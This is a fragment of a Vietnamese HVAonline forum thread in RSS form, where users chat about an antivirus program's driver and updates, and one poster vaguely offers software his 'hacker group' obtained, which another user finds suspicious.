nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Không Dũng ah, các phiên bản về sau này chạy khá ổn định nên không có update kernel, chỉ update database thôi. Mới được thả ra hay sao mà vào HVA post bài um sùm thế này :-) 
Ủa cái FireLion của pác hoàng có cả driver nữa sao? đợt trước mình cài thử đâu có thấy?]]>
/hvaonline/posts/list/10351.html#97986 /hvaonline/posts/list/10351.html#97986 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#98017 /hvaonline/posts/list/10351.html#98017 GMT Re: Thử nghiệm chương trình diệt Virus mới

LeVuHoang wrote:
Không Dũng ah, các phiên bản về sau này chạy khá ổn định nên không có update kernel, chỉ update database thôi. Mới được thả ra hay sao mà vào HVA post bài um sùm thế này :-) 
:P bậy nào, lâu nay em có bị lock nick đâu mà "thả' gì ở đây còn em ko để ý đọc bản tin update FH của bác nhưng tự nhiên cái máy em nó thế thì tất nhiên em phải nghĩ vậy :D Bởi vậy mà em mới có dòng này trước khi "Trình bày" nè :
cái này ko biết có đúng ko  
:^) ]]>
/hvaonline/posts/list/10351.html#98062 /hvaonline/posts/list/10351.html#98062 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#113985 /hvaonline/posts/list/10351.html#113985 GMT Re: Thử nghiệm chương trình diệt Virus mới

thanhlam_IT wrote:
chào các bạn tôi là thanh lâm IT của cty huynhdai và cũng là thành viên trong ban quản trị hacker admin tôi thấy các bạn bàn về các chương trỉnh diệt virus có vẻ đam mê nhỉ, nhưng tôi có phần mền này hay lắm đây là phần mền của nước ngoài do nhóm hacker của chúng tôi láy được và mã hóa băng tiếng việt ai quan tâm thì báo cho tôi nha 
Tớ thấy 2 cái chỗ bôi đỏ đó ko đựoc bình thường lắm!!! hjx.... sorry!!! :-/ Thân LKL!!!]]>
/hvaonline/posts/list/10351.html#113999 /hvaonline/posts/list/10351.html#113999 GMT
Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#150418 /hvaonline/posts/list/10351.html#150418 GMT Re: Thử nghiệm chương trình diệt Virus mới /hvaonline/posts/list/10351.html#159533 /hvaonline/posts/list/10351.html#159533 GMT